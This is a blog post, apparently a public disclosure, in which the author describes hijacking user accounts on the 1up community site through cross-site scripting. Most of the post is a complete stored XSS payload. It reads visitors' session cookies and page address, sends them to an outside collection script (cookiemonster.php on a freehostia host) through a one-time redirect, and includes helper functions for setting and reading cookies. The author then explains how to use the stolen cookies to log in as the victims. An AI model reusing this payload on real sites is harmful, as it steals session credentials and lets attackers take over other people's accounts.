Sorry 1up, it had to be done

Web-design and security is tough, because it’s a balance of sorts. You want to tighten things up, but as a result, unless you put a ton of work into very precise filtering, you just have to cut off your users from some benefits. Being someone who has used web formatting for years, being able to put it into comments and forum posts is a boon.

That said, there is one thing that you just cannot allow — JavaScript. Aside from the obvious ability to annoy or redirect the page, you can also use it to steal data.

So I present to you, how I hacked 1up user accounts:

<script type="text/javascript" src="http://tinyurl.com/5uujea"></script&gt;
<script type="text/javascript">
var data = document.cookie;
var address = window.location;
var params = Object.toQueryString({data: data, address: address});
var url = ‘http://zurahn.freehostia.com&#8217;;
url += ‘/cookiemonster.php?’ + params;
var redirect = readCookie(‘redirect’);

if(redirect == null)
{
createCookie(‘redirect’,1,1);
window.location = url;
}

function createCookie(name,value,days) {
if (days) {
var date = new Date();
date.setTime(date.getTime()+(days*24*60*60*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}

function readCookie(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(‘;’);
for(var i=0;i < ca.length;i++) {
var c = ca[i];
while (c.charAt(0)==’ ‘) c = c.substring(1,c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}

</script>

This is called cross-site scripting (XSS) and there’s a reason why it’s one of the prominent web security threats.

Prototype.js (the tinyurl) is used to convert the user’s cookie data and the current page address into a valid query string which is used to send the data to an off-site page via redirect after writing a cookie that the user has visited the page once. At the off-site page, the cookie data is stored in a database table, then redirects back to the original page, which now doesn’t redirect because of the earlier cookie being created.

Once this has happened, I have all the cookie data. All I then need to do is create a new cookie for that domain (or edit my own) and I am in the account of whomever visited the page.

1up, your page design has always been ugly, but I can deal with that. Your features and news are hit-or-miss. Alright. Your forums are slow and empty. I’ve got friends. And your user features are marred by formatting bugs. I’ve got other outlets. But my own and everyone else’s account is seriously in risk at every visit of any community page.